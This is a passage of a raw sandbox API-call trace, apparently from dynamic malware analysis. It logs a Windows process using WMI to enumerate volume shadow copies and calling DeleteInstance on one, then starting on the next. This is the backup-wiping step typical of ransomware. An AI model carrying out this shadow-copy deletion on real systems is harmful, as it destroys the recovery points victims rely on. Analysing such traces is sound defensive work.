riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0134.984] IUnknown:AddRef (This=0x1c9109e0) returned 0x3 [0134.984] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0134.984] IUnknown:QueryInterface (in: This=0x1c9109e0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c9109e8) returned 0x0 [0134.984] IMarshal:GetUnmarshalClass (in: This=0x1c9109e8, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0134.984] IUnknown:Release (This=0x1c9109e8) returned 0x3 [0134.985] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0134.985] IUnknown:AddRef (This=0x1c9109e0) returned 0x4 [0134.985] IUnknown:QueryInterface (in: This=0x1c9109e0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0134.985] IUnknown:Release (This=0x1c9109e0) returned 0x3 [0134.985] IUnknown:Release (This=0x1c9109e0) returned 0x2 [0134.985] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0134.985] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0134.985] IUnknown:AddRef (This=0x1c9109e0) returned 0x3 [0134.985] IUnknown:QueryInterface (in: This=0x1c9109e0, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c9109e0) returned 0x0 [0134.985] IUnknown:Release (This=0x1c9109e0) returned 0x3 [0134.985] IUnknown:Release (This=0x1c9109e0) returned 0x2 [0134.985] IUnknown:Release (This=0x1c9109e0) returned 0x1 [0134.986] CoTaskMemFree (pv=0x27f6b0) [0134.986] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0134.986] IUnknown:AddRef (This=0x1c9109e0) returned 0x2 [0134.986] IWbemClassObject:Get (in: This=0x1c9109e0, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0134.986] IWbemClassObject:Get (in: This=0x1c9109e0, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0134.986] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"") returned 0x53 [0134.986] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0134.986] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0134.986] IUnknown:QueryInterface (in: This=0x212498, riid=0x2e77e70*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0134.986] IUnknown:Release (This=0x212498) returned 0x1 [0134.987] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c8f1a60) returned 0x0 [0134.987] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1a60, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0134.987] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1a60, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c903790) returned 0x0 [0134.987] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903790, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c903790) returned 0x0 [0134.987] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903790, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0134.988] WbemDefPath:IUnknown:AddRef (This=0x1c903790) returned 0x3 [0134.988] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0134.988] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903790, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b793970) returned 0x0 [0134.988] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b793970, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0134.988] WbemDefPath:IUnknown:Release (This=0x1b793970) returned 0x3 [0134.988] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0134.988] WbemDefPath:IUnknown:AddRef (This=0x1c903790) returned 0x4 [0134.988] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903790, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0134.989] WbemDefPath:IUnknown:Release (This=0x1c903790) returned 0x3 [0134.989] WbemDefPath:IUnknown:Release (This=0x1c903790) returned 0x2 [0134.989] WbemDefPath:IUnknown:Release (This=0x1c8f1a60) returned 0x0 [0134.989] WbemDefPath:IUnknown:Release (This=0x1c903790) returned 0x1 [0134.989] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0134.989] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0134.989] WbemDefPath:IUnknown:AddRef (This=0x1c903790) returned 0x2 [0134.989] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903790, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c903790) returned 0x0 [0134.989] WbemDefPath:IUnknown:Release (This=0x1c903790) returned 0x2 [0134.989] WbemDefPath:IUnknown:Release (This=0x1c903790) returned 0x1 [0134.989] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0134.990] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0134.990] WbemDefPath:IUnknown:AddRef (This=0x1c903790) returned 0x2 [0134.990] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903790, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c903790) returned 0x0 [0134.990] WbemDefPath:IUnknown:Release (This=0x1c903790) returned 0x2 [0134.990] WbemDefPath:IUnknown:AddRef (This=0x1c903790) returned 0x3 [0134.990] WbemDefPath:IWbemPath:SetText (This=0x1c903790, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"") returned 0x0 [0134.990] WbemDefPath:IUnknown:Release (This=0x1c903790) returned 0x2 [0134.990] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0134.990] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0134.990] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.990] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0134.990] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0134.991] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.991] IWbemClassObject:Get (in: This=0x1c9109e0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0134.991] SysStringLen (param_1="root\\cimv2") returned 0xa [0134.991] IWbemClassObject:Get (in: This=0x1c9109e0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0134.991] SysStringLen (param_1="root\\cimv2") returned 0xa [0134.991] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0134.991] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0134.991] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.991] IWbemClassObject:Get (in: This=0x1c9109e0, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0134.991] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0134.991] IWbemClassObject:Get (in: This=0x1c9109e0, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0134.991] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0134.994] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c903790, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0134.994] WbemDefPath:IWbemPath:GetText (in: This=0x1c903790, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0134.995] WbemDefPath:IWbemPath:GetText (in: This=0x1c903790, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"") returned 0x0 [0134.995] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0134.995] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0134.995] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.995] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0134.995] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0134.995] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0134.995] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0134.995] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0134.995] IWbemClassObject:Get (in: This=0x1c9109e0, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0134.995] WbemDefPath:IWbemPath:GetText (in: This=0x1c903790, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0134.995] WbemDefPath:IWbemPath:GetText (in: This=0x1c903790, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"") returned 0x0 [0134.995] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0135.650] CoTaskMemAlloc (cb=0x8) returned 0x27f6b0 [0135.650] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x27f6b0, puReturned=0x1c64d8b8 | out: apObjects=0x27f6b0*=0x1c910c90, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0135.651] IUnknown:QueryInterface (in: This=0x1c910c90, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c910c90) returned 0x0 [0135.652] IUnknown:QueryInterface (in: This=0x1c910c90, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0135.652] IUnknown:QueryInterface (in: This=0x1c910c90, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0135.652] IUnknown:AddRef (This=0x1c910c90) returned 0x3 [0135.652] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0135.652] IUnknown:QueryInterface (in: This=0x1c910c90, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c910c98) returned 0x0 [0135.652] IMarshal:GetUnmarshalClass (in: This=0x1c910c98, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0135.652] IUnknown:Release (This=0x1c910c98) returned 0x3 [0135.652] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0135.653] IUnknown:AddRef (This=0x1c910c90) returned 0x4 [0135.653] IUnknown:QueryInterface (in: This=0x1c910c90, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0135.653] IUnknown:Release (This=0x1c910c90) returned 0x3 [0135.653] IUnknown:Release (This=0x1c910c90) returned 0x2 [0135.653] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0135.653] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0135.653] IUnknown:AddRef (This=0x1c910c90) returned 0x3 [0135.653] IUnknown:QueryInterface (in: This=0x1c910c90, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c910c90) returned 0x0 [0135.653] IUnknown:Release (This=0x1c910c90) returned 0x3 [0135.653] IUnknown:Release (This=0x1c910c90) returned 0x2 [0135.653] IUnknown:Release (This=0x1c910c90) returned 0x1 [0135.653] CoTaskMemFree (pv=0x27f6b0) [0135.653] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0135.653] IUnknown:AddRef (This=0x1c910c90) returned 0x2 [0135.654] IWbemClassObject:Get (in: This=0x1c910c90, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0135.654] IWbemClassObject:Get (in: This=0x1c910c90, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0135.654] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"") returned 0x53 [0135.654] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0135.654] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0135.654] IUnknown:QueryInterface (in: This=0x212498, riid=0x2e77e70*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0135.654] IUnknown:Release (This=0x212498) returned 0x1 [0135.655] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c8f1a20) returned 0x0 [0135.655] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1a20, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0135.655] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1a20, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c903850) returned 0x0 [0135.655] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903850, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c903850) returned 0x0 [0135.655] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903850, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0135.656] WbemDefPath:IUnknown:AddRef (This=0x1c903850) returned 0x3 [0135.656] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0135.656] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903850, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b796ea0) returned 0x0 [0135.656] 